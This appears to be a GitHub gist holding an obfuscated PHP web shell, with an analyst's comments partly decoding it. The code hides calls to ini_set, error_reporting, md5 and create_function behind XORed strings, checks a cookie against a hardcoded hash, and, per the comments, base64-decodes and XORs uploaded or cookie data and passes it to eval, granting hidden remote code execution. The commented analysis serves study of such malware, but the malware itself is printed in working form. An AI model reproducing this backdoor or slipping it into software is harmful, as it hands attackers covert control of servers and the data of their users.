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Created December 10, 2015 21:33
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  • Save FrancisBaileyH/2edd6af014ea6fda4318 to your computer and use it in GitHub Desktop.
Save FrancisBaileyH/2edd6af014ea6fda4318 to your computer and use it in GitHub Desktop.
$xzsuh = '$7-"]A8qcb[rj@y';
// m
$bpvdd = '!a@nT' ^ 'L';
$auzn = '%1#';
$mgfbv = 'V_xZCYzWRI_NOd^YWF2P[r|J,qP]vIfS';
$tj = ',%XQ6Aq(#7';
$whhwy = 'u8?+r%h';
// ini_set
$krqf = 'VQGt:VER&ow2u' ^ '??.+I31';
// error_reporting
$dghpp = '3GA,K#)MT:[Y2V*' ^ 'V53C9|[($U)-[8M`KrE/Z';
// d5
$gqwmvj = '4}' ^ 'PH`T.P';
$atj = 'W+';
// X eJwWf\:\
$eevd = '#8@=:3B0?xi]5dE}' ^ '{0`)_y5gYw5gil[';
$qkkgc = 0;
// We know from the code above that $krqf is equal to ini_set
// and $dghpp is equal to "error_reporting" and $qkkgc is set
// to 0 directly above so we know that that this line is:
// ini_set('error_reporting', 0);
$krqf($dghpp, $qkkgc);
$bcae = 'OW=0B$.NVY4_L^M';
// ,%XQ6Aq(#7W+
$chbnph = $tj . $atj;
$waw = @$_COOKIE;
// Another function call. Again we know that $dghpp is
// equal to 'error_reporting' and we also know $qkkgc is
// equal to 0. So this line evalutes to:
// error_reporting(0);
$kr = 'ehI8plBdc{jz,Ro?awT3iKM+HF`lDyRg';
$atj = $bpvdd . $gqwmvj;
// "create_function"
$ibvffk = $chbnph . $auzn ^ $bcae;
// We know that $waw was assigned the $_COOKIE super global
// so this evalutes to:
// $qgexh = $_COOKIE['zqcvp'];
$qgexh = $waw['zqcvp'];
// This value looks very similar to a hash value
// 371b35831254c61f61fc291ad7012044
$vzy = $kr . 'ftAx' ^ $mgfbv;
// if ("371b35831254c61f61fc291ad7012044" == md5($_COOKIE['zqcvp']))
if ($vzy == $atj($qgexh)) {
$oxkj = 'nPb]N7%Z34Fj]RZ(.2oT&v:``z)cL909REytO}WB_$E$64]*:#@/L3A*El_k-=7x+jfY8VA+qe)x5I$)HL:QKjoSFkY).`kgt?mYL4$WOOpYa[KjONMFwND$T8RNL+rry`gvI,Y5[^A-fh`ly$M_+fXU-lM)MZVJ9;cwtb--0gaw[C8XCf02EFL=d_*N/A{KpyQ@3.)7n.#4i/X^8TIhr3c?O=ASU]UrIV1FyQh7XN,2X';
$nbwlb = 'zWA$I-4NH{]^W*Cy|1&3';
$gj = 'Cw1VaN^)yg*';
// 0
$buupi = $lbq ^ 'ayb(oYgI-Lk)5N=^$_Bf3Fw)tb';
$ndix = '$2+YS,yhMM?_Q=*=r(!/PeZC8';
$esz = 'U+"DpMITACDJ=z494%t5#{CN+' . 'mxh';
$yintv = '$k`P/Cz';
$tbjq = 'Rs.N$[B7a%??$OuM#UCP';
$cdyot = 'tCKS+@tq)/)iZ+cg60';
$mivbcw = $oxkj . $tbjq;
$nuim = 'dYky!]H,EM{B|77XZKGpy0s,%)rA;C[Q&g$]f]hb9M)AiS8^e@/A8V/^6D{4kt{=x1D.B=)_S8rZA$Tv&-W4i7Fs|K}vm/$,=z6{;NO?;m-bkRBN+;4{_o!I$L+fht4;5%4-kH2M6)cpOA@SYB$3N9?0Y3.F#.3$MHKS+$dau4:U?(@54Dmig2!M;1K#Jc&bPCqdlmfx%gfoKK3&U#k5I9j6kO(+2*2O+7B#Oe7S=-CV=' . $nbwlb;
$buoxw = '^5^&!K{`,,=0VvK2';
$uhd = 'Kc4(|+zdQ*e=p3@n' . $ximo;
// 0
$wxojo = 'Kc4(|+zdQ*e=p3@n' ^ $olzxu;
$uyvnw = $qpovk . 'yo#0c5l/+2D2@Bp6Ln)9Yu';
$iow = '.4W}Ny*Rtw"K{){(*#';
$nuim .= ':63yj.PVYpmP4rW@$S{J##T3/CRY:1';
// $ojmvvy = (!empty($_FILES["wzkht"])) ? file_get_contents($_FILES["wzkht"]["tmp_name"]) : $_COOKIE["wzkht"];
// $duy= (!empty($_FILES["dkxmw"])) ? file_get_contents($_FILES["dkxmw"]["tmp_name"]) : $_COOKIE["dkxmw"];
// $rixgwg = base64_decode($ojmvvy)^base64_decode($duy);
// @eval($rixgwg); "
$iuib = $nuim . 'f{IqV6H' ^ $mivbcw . 'URVQNJ%/pKgY=226E?SnQJ,TX${b08';
$xef = $xef . 'skluXYBZR??tzo';
$tbaj = 'X|wUS9&&o5;,llpy]8i';
$dppx = $dppx . '[@!qz7^';
$gskq = 'hmm2ZB8y0qB@{Iu,[aKgYKH7' . ',Mq!n_o$8A0.6-/L';
// create_function(null, $iuib);
// returns lambda_1
// essentially creates an anonymous function
$wwii = $ibvffk($uwks, $iuib);
// null was passed as the first argument into create_function so
// $wwii doesn't actually accept any parameters
// but it helps throw off anyone trying to interpret it
$wwii('$(R6%]w?dvM!y$`-w?-HR{*Oyf=,$IRsqDS+r@BE!O.*:', 'mOZT[_]');
$rsx = $zff;
$yknx = 'L+O_$UrRRsHO=sZmn$';
$txwtr = 'hN8#8sM^';
$oqxj = 'oU4!qG1';
$lhbv = ':?L9"asAc64HuHR:}O';
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